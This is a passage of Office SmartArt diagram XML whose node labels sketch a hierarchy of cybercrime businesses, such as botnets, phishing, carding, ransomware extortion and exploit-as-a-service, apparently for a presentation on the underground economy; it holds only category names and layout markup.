    <dgm:cxn modelId="{67966BE4-FE5C-4570-9440-292AFFDB4ECC}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{4F3658AF-6F52-4172-B81C-592F00EDFFF5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{5B4386DD-F917-43FB-BD7A-792114CE85BD}" type="presParOf" srcId="{26B98B58-CCA1-49D4-A030-D5CDC237226A}" destId="{769CFD7A-F5DE-46F5-9CC2-F86EEF9DC6D8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D68CB307-387B-4B02-BB59-4F8D93E9BECE}" type="presParOf" srcId="{079BF440-650D-4823-B2D6-4DF79A303EB7}" destId="{F80F370F-4960-4A7F-8CDD-3F645777D926}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{C7262EEE-09B2-4C39-B93D-0C6697BFCA6B}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1164DF9C-47B4-4930-BF8C-FB83C56F57E8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9ABDAE99-4AA9-4F09-8D3E-8A19AF57C419}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{A778D506-92B5-4FC9-8988-820EDFBF4190}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{67965192-6709-4753-B296-83A5E275D540}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{96FDB7BD-35DB-46BD-8744-5C5B8B4000BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{49871D27-F564-45D4-9535-E5D3429C61C3}" type="presParOf" srcId="{D3F9391C-904D-4C42-9756-3F7D6BB5BF48}" destId="{1DE75C67-9F60-4DCF-8A09-6EBB5AA047F8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{72988983-F36C-49B8-9178-884F57BA9842}" type="presParOf" srcId="{BB6C78B2-14D7-4BAD-A77C-2CC056C23A03}" destId="{3E089C12-00A1-4C52-ACA6-DA689DC530B1}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D3D7B3E0-2DE8-4C73-8092-27B984FFF627}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{DCB922D2-A971-46B6-8A66-A63871EC5D71}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{913BBCA6-6A15-4081-ACFB-D98F477B7550}" type="presParOf" srcId="{4E08EAE1-867C-4CDD-9B42-8EEF5B0AB9A5}" destId="{1BE63070-B619-415B-AE72-C4895210C2ED}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{88885C49-E13F-46DB-BD55-02549CE6B683}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{39DE0E1E-A457-4031-A6D1-C04DDA15C6D9}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{0F54FE08-C494-4F47-82B7-FE51BDB88D1B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{26F2BD33-885F-4A44-82C7-4A65EBFA30E6}" type="presParOf" srcId="{2CDC735E-3F1A-4A75-90D7-4773653B5E0B}" destId="{D7493045-F4D0-49BB-8749-0235A8D3915E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{F54E657B-FEC8-4658-B618-9477ABD53598}" type="presParOf" srcId="{1BE63070-B619-415B-AE72-C4895210C2ED}" destId="{E562E629-8E7C-4C02-A214-F4E36EE87E99}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AE993755-C27B-4D66-B7FA-337056FF690B}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{B2CAA67D-ED33-4120-9634-DF98516FB005}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{4BC450DA-C7E2-4383-A9BD-D326CF26687E}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{B0B4EB34-DD2F-4309-B751-E58D5D591CAF}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{9532000B-227B-4799-A1D1-6E51BB4EC17B}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{A20E9766-61CD-4711-B99D-41622BFCA782}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{D0537B6E-16F4-4A9A-A7DF-AE2F524FE785}" type="presParOf" srcId="{EE9C7157-398A-46DB-BD6B-659BF0106723}" destId="{E1CF22F3-AC19-46C9-A82F-89D8DB189CE8}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E619EEAD-D932-4228-A171-FDFC2A3FA229}" type="presParOf" srcId="{0DF4443E-EF58-4CDA-AE3C-5FC35EE675D5}" destId="{4A7C2F52-ACA9-4730-89EA-B234D19B30FD}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{AC723CA2-7799-4818-B6E1-D9570D14FB31}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{CE2BD6A2-C6A6-4AE7-8716-F62AC787B4F6}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{137C7443-E818-4254-BC58-ED1832584EF8}" type="presParOf" srcId="{2E181DEB-77C8-4F85-AFDB-3414732DC5B6}" destId="{124F88C5-C1D5-4402-8050-69A3610B0063}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{0B5E36FB-CF72-4F52-8173-8D0CCEDA9AF4}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{DC7E7830-0E48-4050-9CC0-FF34AA022703}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{5B804CA3-5F0C-4C9A-9948-6267A36AC286}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{2CA4696A-F32D-4557-9668-86E3DEF687D3}" type="presParOf" srcId="{AA562350-23EB-4A00-9F4B-5CA6A4AF8D46}" destId="{F83FE0F9-C0AD-41ED-8499-585D4FDF8177}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hierarchy1"/>
    <dgm:cxn modelId="{E8990450-3DB7-4904-A625-F1E80A3C4A27}" type="presParOf" srcId="{124F88C5-C1D5-4402-8050-69A3610B0063}" destId="{E3521F4E-CD84-466B-AF37-02AB70C55B9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20B35F-2635-4F8F-9051-2B1A318D39FF}"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B632587F-1A59-4B58-8F39-3F88332608F5}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Botnets</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E780597-A9D7-4E6A-B969-7F37A974753C}" type="parTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAFC8618-BD8D-4D8C-BB34-17C52689EDA4}" type="sibTrans" cxnId="{E50FB978-B72E-4ADD-B08D-9D1C5B9112CA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6F06AC04-9C84-4A47-BFDD-AE87232D1106}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Credit Card and Bank Account Theft</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5E7D7A7B-2ADD-469E-B0F8-D565F03F46F9}" type="parTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33C404C4-6211-4C8B-9140-D0533EAFE621}" type="sibTrans" cxnId="{6955F1D0-FCF9-4D8D-BAD2-2E27D171F963}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4F920927-1A73-470C-97F0-75ABFA67423F}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Carders, Cashiers, and Money Mules</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4B2D1F3B-F359-4548-91E0-0C2AC7CCD7A1}" type="parTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{79406963-93E8-4610-9E27-FEFF794E3AB0}" type="sibTrans" cxnId="{82B5D393-E6BA-4C99-82EC-CE197264E0FD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{426355DA-85B0-49DB-B723-939237685E7C}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>DDoS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> and Ransomware Extortion</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{05039FCC-4F08-4EEE-ACAE-BAC85EFDD1D7}" type="parTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C7DCF50B-90BE-4C41-AAFB-5990C2737070}" type="sibTrans" cxnId="{EEE27B68-13C0-4E69-9E3D-E81F26365082}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{03A48CFA-6496-41BF-A746-80A181C3C3DE}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Spam</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72633D96-4A27-4E50-A39C-37AB41EEA9FE}" type="parTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8E5E1350-FE66-4F91-840A-B3A1E5069B7E}" type="sibTrans" cxnId="{C81AFF4B-9D0E-40B1-8E5B-30F389DDAD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45F34A96-294F-4F91-858C-0CCFEC2CFF6B}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Bitcoin Mining</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E3BBBB2C-8F74-4541-A78F-D9AB9652D44B}" type="parTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3AD622BB-3D20-4961-90A9-7E3A3EAB1155}" type="sibTrans" cxnId="{BC699438-0C3B-47B3-AEEF-4B3B9C697BED}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C92294B8-F12A-42FD-B72C-42C2FDCD2D8E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Phishing</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{80A49C2A-5C20-42BB-A1DC-6558C20289C2}" type="parTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{611D77A5-92DE-47E3-878A-892C64739260}" type="sibTrans" cxnId="{300F84A7-6FDC-427E-9649-2E614B2A1266}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3CB81644-432E-42AF-ABA9-71ABDDE58956}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Counterfeit Goods</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{95C1DC5D-E737-4A41-83F0-AD800A95D9F5}" type="parTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{87368739-70E0-48CC-B078-DBA02B966C38}" type="sibTrans" cxnId="{FCFD1F00-69B0-4BBB-AC3F-C6E2A9364DB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{934DA221-5443-497E-A4E4-A348E6ACDDB7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Malware Attachments</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{37AAF2A0-4D79-4496-8E06-D2AF95C6A459}" type="parTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4D10C71-FE60-4F42-8EF6-606461EE738A}" type="sibTrans" cxnId="{E7DA6F74-E0A4-4C91-906F-78261B5CC048}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7262895B-02E6-4067-B862-A12DB86A98B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pharma</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B84157D2-97EE-4800-B4AC-94C8F5F6CAC1}" type="parTrans" cxnId="{48E9A6F3-62C7-4B34-8F68-E30BE366DA6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{28D31E2B-7F29-4B0D-9CDC-20DFC358C7ED}" type="sibTrans" cxnId="{48E9A6F3-62C7-4B34-8F68-E30BE366DA6C}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A040FE0B-3A44-46B9-9424-B56BC4D65E95}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1"/>
            <a:t>Blackhat</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t> SEO</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8D121FA2-20E5-4E0E-88EC-D5A9C0452847}" type="parTrans" cxnId="{AB9BDB96-A156-473B-BFA6-EECEEE12996E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0ECBD85E-E0D0-495A-A4FD-CAF42D3ADB40}" type="sibTrans" cxnId="{AB9BDB96-A156-473B-BFA6-EECEEE12996E}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Pay-per-Install and Exploit-as-a-Service</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A42A7329-4DA3-4869-8617-3824288EF391}" type="parTrans" cxnId="{14380A70-6C0D-4A7D-B752-D44E7EB01E39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8CDE658F-6147-4FED-A73B-62A6AC1A7E5F}" type="sibTrans" cxnId="{14380A70-6C0D-4A7D-B752-D44E7EB01E39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{EC9FE7DE-111B-427E-B20F-BE55EAAA5C05}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Stolen Account Credentials</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C4F9A58A-71BA-480D-A44D-85E6052D9457}" type="parTrans" cxnId="{4FAA5713-4C82-4B01-A806-3805C6348315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2E4EC8B8-ADA8-4018-ACC7-85917FA79FD3}" type="sibTrans" cxnId="{4FAA5713-4C82-4B01-A806-3805C6348315}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5048C93B-541A-4FDD-AC3E-2671C3EB6C9E}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Click Fraud and Ad Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9F1BEEB-C5D9-4347-9606-A26E3DC42AA2}" type="parTrans" cxnId="{9F116194-E782-4DFC-B1D4-64DB22002ACC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D8F5181-9AE1-45D5-A651-15502F126A3A}" type="sibTrans" cxnId="{9F116194-E782-4DFC-B1D4-64DB22002ACC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{758232FE-730C-49AE-A3A1-86B6C0DD3E92}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Fake Anti-virus</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{33603E56-D327-4393-B45F-8318C1455A1A}" type="parTrans" cxnId="{9E7EDD52-831F-410B-8A4F-430B1D40EB25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{637ED415-5586-46D0-B1C4-2C867149D348}" type="sibTrans" cxnId="{9E7EDD52-831F-410B-8A4F-430B1D40EB25}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{06972473-63C5-472F-8F19-A41060A212F6}" type="pres">
      <dgm:prSet presAssocID="{A220B35F-2635-4F8F-9051-2B1A318D39FF}" presName="hierChild1" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:chPref val="1"/>
          <dgm:dir/>
          <dgm:animOne val="branch"/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{02AF47CA-BA1B-4B12-BD86-A3544B44C5B9}" type="pres">
      <dgm:prSet presAssocID="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}" presName="hierRoot1" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3DCCE651-EFB3-4A01-B4F5-C2120262F060}" type="pres">
      <dgm:prSet presAssocID="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{301B31C6-CC49-4888-BF15-7D36EC2364E3}" type="pres">
      <dgm:prSet presAssocID="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}" presName="background" presStyleLbl="node0" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{80D6E11A-7365-4E7C-A174-08A7BBA7C802}" type="pres">
      <dgm:prSet presAssocID="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}" presName="text" presStyleLbl="fgAcc0" presStyleIdx="0" presStyleCnt="1" custScaleX="153773" custLinFactX="100000" custLinFactNeighborX="136629" custLinFactNeighborY="-20043">
        <dgm:presLayoutVars>
          <dgm:chPref val="3"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B94FDCE5-F020-4898-B915-04F055363FB6}" type="pres">
      <dgm:prSet presAssocID="{2D5D588F-80DC-4FDD-98BE-6E3704DB411B}" presName="hierChild2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{503B26D2-9048-4DFE-9E37-9E8A6613E98D}" type="pres">
      <dgm:prSet presAssocID="{8E780597-A9D7-4E6A-B969-7F37A974753C}" presName="Name10" presStyleLbl="parChTrans1D2" presStyleIdx="0" presStyleCnt="1"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2BD526EB-EA22-4607-AE3A-AFACCD57C85D}" type="pres">
      <dgm:prSet presAssocID="{B632587F-1A59-4B58-8F39-3F88332608F5}" presName="hierRoot2" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{02800E3E-E97E-4F9C-A7A5-FB1CC564357B}" type="pres">
      <dgm:prSet presAssocID="{B632587F-1A59-4B58-8F39-3F88332608F5}" presName="composite2" presStyleCnt="0"/>
      <dgm:spPr/>
